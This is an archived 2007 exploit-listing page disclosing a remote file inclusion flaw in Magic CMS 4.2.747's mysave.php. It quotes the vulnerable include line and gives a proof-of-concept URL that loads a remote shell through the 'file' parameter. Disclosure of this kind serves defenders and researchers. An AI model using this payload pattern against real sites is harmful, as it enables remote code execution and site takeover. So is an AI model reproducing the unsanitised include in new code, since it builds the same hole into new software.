Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability
# Published : 2007-03-08
# Author : DNX
# Previous Title : GaziYapBoz Game Portal (kategori.asp) Remote SQL Injection Vuln
# Next Title : PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability

#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo---------------------
   | Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
   |        (works only with register_globals = on)        |
   |                     coded by DNX                      |
   ---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes

[!] Background: Magic CMS is an easy to use content 
    management system based on PHP.

[!] Bug: $file in mysave.php line 3 
         
         @include($file."/myconfig.php");
         
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]

[!] Solution: Waiting for patch/update. No response from 
    vendor.

# www.Syue.com [2007-03-08]